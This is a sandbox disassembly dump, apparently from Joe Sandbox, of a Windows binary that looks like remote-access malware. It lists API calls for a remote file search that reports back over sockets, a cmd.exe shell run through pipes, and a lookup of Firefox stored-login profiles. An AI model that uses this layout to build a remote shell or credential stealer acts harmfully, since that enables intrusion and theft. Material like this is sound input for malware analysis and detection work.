                                • Part of subcall function 00402504: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040252D
                                • Part of subcall function 00402504: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402541
                                • Part of subcall function 00402504: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040254D
                                • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402556
                                • Part of subcall function 00402504: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402561
                                • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 00402570
                                • Part of subcall function 00402504: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040257A
                                • Part of subcall function 00402504: send.WS2_32(?,00000000), ref: 00402584
                                • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025DB
                                • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025E4
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00402D06
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00402D12
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00402D1E
                              • _CxxThrowException.MSVCRT(00000001,00411A80), ref: 00402D3E
                              • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00402D4C
                              • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00402D56
                              • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00402D60
                              • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,004107BC,?), ref: 00402D86
                              • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00402D90
                              • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00402D97
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00402DA6
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(searchwrongpath,?), ref: 00402DC5
                              • _CxxThrowException.MSVCRT(00000002,00411A80), ref: 00402DE9
                              • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00402DF8
                              • wcscmp.MSVCRT ref: 00402E25
                              • wcscmp.MSVCRT ref: 00402E3D
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0041079C), ref: 00402E62
                              • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00402E74
                              • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00402E84
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00402E92
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00402E9E
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402EAD
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402EBF
                                • Part of subcall function 00403183: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00415268,76EAA270), ref: 00403198
                                • Part of subcall function 00403183: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,00415268,76EAA270), ref: 004031A7
                                • Part of subcall function 00403183: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00415268,76EAA270), ref: 004031B1
                                • Part of subcall function 00403183: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00415268,76EAA270), ref: 004031BB
                                • Part of subcall function 00403183: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,004107BC,?), ref: 004031DE
                                • Part of subcall function 00403183: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 004031E8
                                • Part of subcall function 00403183: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 004031EF
                                • Part of subcall function 00403183: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004031FB
                                • Part of subcall function 00403183: FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00403215
                                • Part of subcall function 00403183: wcscmp.MSVCRT ref: 00403247
                                • Part of subcall function 00403183: wcscmp.MSVCRT ref: 0040325F
                                • Part of subcall function 00403183: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00403277
                                • Part of subcall function 00403183: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00403286
                                • Part of subcall function 00403183: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00403293
                                • Part of subcall function 00403183: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040329E
                                • Part of subcall function 00403183: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004032A7
                                • Part of subcall function 00403183: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004032B6
                                • Part of subcall function 00403183: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004032C5
                              • _CxxThrowException.MSVCRT(00000003,00411A80), ref: 00402EE6
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000003,00411A80), ref: 00402EF1
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00402F0B
                              • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?), ref: 00402F1D
                              • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00402F2A
                              • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00402F37
                              • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00402F52
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00402F7F
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402F89
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402F95
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,filefound,00415268,00000000,00415268,?), ref: 00402FC7
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00415268,?), ref: 00402FD7
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 00402FE7
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 00402FF1
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403015
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403021
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040302D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403039
                              • _CxxThrowException.MSVCRT(00000004,00411A80), ref: 00403059
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000004,00411A80), ref: 00403064
                              • FindClose.KERNEL32(000000FF,?,?,?), ref: 00403076
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,searchfinished,00415268,?,00415268,?), ref: 00403099
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,?), ref: 004030A9
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 004030B9
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 004030C3
                                • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402590
                                • Part of subcall function 00402504: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040259A
                                • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000), ref: 004025B4
                                • Part of subcall function 00402504: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 004025BE
                                • Part of subcall function 00402504: send.WS2_32(?,00000000), ref: 004025C8
                                • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025D2
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004030D9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004030E5
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004030F1
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004030FA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 00403112
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040311B
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 00403124
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040312D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 00403136
                              • atoi.MSVCRT ref: 00403101
                                • Part of subcall function 00403474: _EH_prolog.MSVCRT ref: 00403479
                                • Part of subcall function 00403474: closesocket.WS2_32(?), ref: 004034BB
                                • Part of subcall function 00403474: TerminateThread.KERNEL32(?,00000001,00000000,?,00000001,00000001,00000000,00000000,6A41AFB0,6A41AFB0,?,?,0040C61E,00000000), ref: 004034CD
                              • _CxxThrowException.MSVCRT(00000000,00000000), ref: 0040314F
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000000,00415278,00000010,00000000,00000001,00000006), ref: 00403157
                              • atoi.MSVCRT ref: 0040315E
                              • FindClose.KERNEL32(?), ref: 0040316F
                              • ExitThread.KERNEL32 ref: 00403177
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$Hstd@@V?$basic_string@$D@2@@0@$??0?$basic_string@V10@0@$?begin@?$basic_string@FindG@2@@0@V01@@$?c_str@?$basic_string@D@1@@ExceptionThrow$?length@?$basic_string@FileV10@wcscmp$?end@?$basic_string@G@1@@V10@@$??4?$basic_string@?data@?$basic_string@CloseFirstH_prologNextThreadV01@atoisend$?empty@?$basic_string@?find@?$basic_string@A?$basic_string@ExitTerminateV12@closesocketconnectsocket
                              • String ID: filefound$searchfinished$searchstarted$searchwrongpath
                              • API String ID: 525724632-2241827744
                              • Opcode ID: 4cfbcc5f81053ed4c7e8ab2eb33a0575d2b32ec319bc07ce2901e7367b85f66b
                              • Instruction ID: 37d5ccb0cac30d8a9bba9e41291a70e7b7d0e58fcafd169c2c2f7e39e65e0a14
                              • Opcode Fuzzy Hash: 4cfbcc5f81053ed4c7e8ab2eb33a0575d2b32ec319bc07ce2901e7367b85f66b
                              • Instruction Fuzzy Hash: 97D11F72900119ABDB15EB60DD8EADE777CAF14305F0041BAF50AA2091EF795F89CF58

                              Control-flow Graph (rendered graph not reproduced here; the APIs list below covers the same function)
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,76E50440,00415268,6A41AFB0,?,0040AD3E,?), ref: 0040E8EC
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,76E50440,00415268,6A41AFB0,?,0040AD3E,?), ref: 0040E904
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0040AD3E,?), ref: 0040E911
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,cmd.exe,?,0040AD3E,?), ref: 0040E920
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(C:\,?), ref: 0040E933
                              • CreatePipe.KERNEL32 ref: 0040E95B
                              • GetStdHandle.KERNEL32 ref: 0040E98B
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000044,?), ref: 0040E9B3
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040E9C3
                              • CreateProcessA.KERNEL32(00000000,00000000), ref: 0040E9CB
                              • Sleep.KERNEL32(?,000001F4), ref: 0040E9DC
                              • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0040E9F6
                              • ReadFile.KERNEL32(?,?,0000C350,00000000,00000000), ref: 0040EA15
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040EA39
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040EA43
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EA4F
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00411890,00000000), ref: 0040EA71
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00411890,00000000,6A3F5E04), ref: 0040EA8C
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000002), ref: 0040EA9F
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040EAA9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EAB5
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP60(00000022,00000000), ref: 0040EAC1
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP60(00000022,00000001), ref: 0040EADA
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,-00000002), ref: 0040EAEE
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040EAF8
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EB42
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410C1C), ref: 0040EB51
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040EB5F
                              • ?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP60(0000005C,6A3F5E04), ref: 0040EB79
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040EB87
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040EB90
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EB99
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP60(0000005C,00000000), ref: 0040EBA4
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(0000005C), ref: 0040EBB8
                              • TerminateProcess.KERNEL32(?,00000000), ref: 0040EC0B
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040EC16
                              • CloseHandle.KERNEL32(?), ref: 0040EC25
                              • CloseHandle.KERNEL32(?), ref: 0040EC2A
                              • CloseHandle.KERNEL32(?), ref: 0040EC37
                              • CloseHandle.KERNEL32(?), ref: 0040EC3C
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040EC4E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,?,0000000D,0000000A,00415B80,0000003E), ref: 0040EC69
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000,?,00000000,?), ref: 0040EC76
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00000000,?), ref: 0040EC83
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(00000000,00000000,?,?,?,?,?,?,?,00000000,?), ref: 0040EC8F
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040EC9A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040ECA3
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040ECAC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040ECB5
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040ECBE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040ECC7
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@V01@V?$basic_string@$??0?$basic_string@?find@?$basic_string@HandleV01@@$??4?$basic_string@CloseD@1@@Hstd@@$?substr@?$basic_string@V10@V12@$??8std@@?c_str@?$basic_string@CreatePipeProcessY?$basic_string@$?length@?$basic_string@?rfind@?$basic_string@FileNamedObjectPeekReadSingleSleepTerminateV10@0@Wait
                              • String ID: C:\$D$cmd.exe
                              • API String ID: 868804582-2369035250
                              • Opcode ID: 9d8aa3c5ac5b6c181e9ade171bcb4f198173e56150405ac709c8867344b16d22
                              • Instruction ID: 6ad45e127cb324f962e26fd75bd9daacbf5f14a3686954285d58c0458e4bac89
                              • Opcode Fuzzy Hash: 9d8aa3c5ac5b6c181e9ade171bcb4f198173e56150405ac709c8867344b16d22
                              • Instruction Fuzzy Hash: 01C13E7190411DEFDB14DBA0DC98EEE7B79FB44304F1084BAF506A61A0DB795E85CB18
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,76F90F00,00000000), ref: 004057C9
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,76F90F00,00000000), ref: 004057D6
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,76F90F00,00000000), ref: 004057E3
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,?,?,76F90F00,00000000), ref: 004057F5
                              • getenv.MSVCRT ref: 00405801
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,76F90F00,00000000), ref: 0040580D
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,00000000), ref: 00405819
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,00000000), ref: 00405822
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,00000000), ref: 0040582B
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,004108F8,?,?,?,00000000), ref: 00405845
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040584F
                              • FindFirstFileA.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00405856
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 00405862
                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,00000000), ref: 00405870
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox StoredLogins not found],?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405886
                                • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,76F90F00,?,00405E64), ref: 00403AAD
                                • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,76F90F00,?,00405E64), ref: 00403AC0
                                • Part of subcall function 00403A9A: SetEvent.KERNEL32(00000000,?,00405E64), ref: 00403AC9
                                • Part of subcall function 00403A9A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(76F90F00,?,00405E64), ref: 00403AD8
                              • FindNextFileA.KERNEL32(000000FF,?,?,?,?,?,?,00000000), ref: 004058A7
